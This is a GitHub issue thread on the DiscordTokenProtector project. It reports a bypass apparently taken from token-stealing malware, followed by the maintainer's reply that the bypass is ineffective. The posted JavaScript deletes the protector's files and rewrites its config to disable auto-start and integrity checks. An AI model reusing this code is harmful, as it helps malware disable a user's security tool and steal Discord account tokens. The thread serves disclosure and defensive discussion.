DiscordTokenProtector icon indicating copy to clipboard operation
DiscordTokenProtector copied to clipboard
verified publisher icon andro2157

Bypass found in the wild

Open CanadaHonk opened this issue 3 years ago • 1 comments 

bypass_token_protector() {
            for (const file of ["DiscordTokenProtector.exe", "ProtectionPayload.dll", "secure.dat"]) {
                if (client.requires.fs.exists(`${client.utils.encryption.decryptData(client.config.user.localappdata)}\\${file}`)) {
                    client.requires.fs.rm(`${client.utils.encryption.decryptData(client.config.user.localappdata)}\\${file}`);
                }
            }
            const token_protector_config = JSON.parse(client.requires.fs.readFileSync(`${client.utils.encryption.decryptData(client.config.user.localappdata)}\\DiscordTokenProtector\\config.json`, {
                encoding: "utf-8"
            }))
            token_protector_config['auto_start'] = false
            token_protector_config['auto_start_discord'] = false
            token_protector_config['integrity'] = false
            token_protector_config['integrity_allowbetterdiscord'] = false
            token_protector_config['integrity_checkexecutable'] = false
            token_protector_config['integrity_checkhash'] = false
            token_protector_config['integrity_checkmodule'] = false
            token_protector_config['integrity_checkscripts'] = false
            token_protector_config['integrity_checkresource'] = false
            token_protector_config['integrity_redownloadhashes'] = false
            token_protector_config['iterations_iv'] = 0
            token_protector_config['iterations_key'] = 0
            token_protector_config['version'] = 0
            client.requires.fs.writeFileSync(
                `${client.utils.encryption.decryptData(client.config.user.localappdata)}\\DiscordTokenProtector\\config.json`,
                JSON.stringify(
                    token_protector_config,
                    null, 4
                )
            )
        }

GLHF

CanadaHonk avatar Oct 02 '22 20:10 CanadaHonk

I've seen similar "bypasses" in the wild. In overall (including this one), they only work if :

  • DTP is not running, and in this case, they can only get the token through social engineering (making you relogin without DTP). The config changes are useless as these critical configs have been moved to the encrypted container.
  • If they run using admin privilege. If you allow a program to run using admin privilege you can safely assume that your token can be easily compromised. DTP cannot block attacks with admin privilege since it is in user land.

In this case, the config change, even if successful, won't do anything.

TLDR : useless bypass that won't do much.

andro2157 avatar Oct 03 '22 16:10 andro2157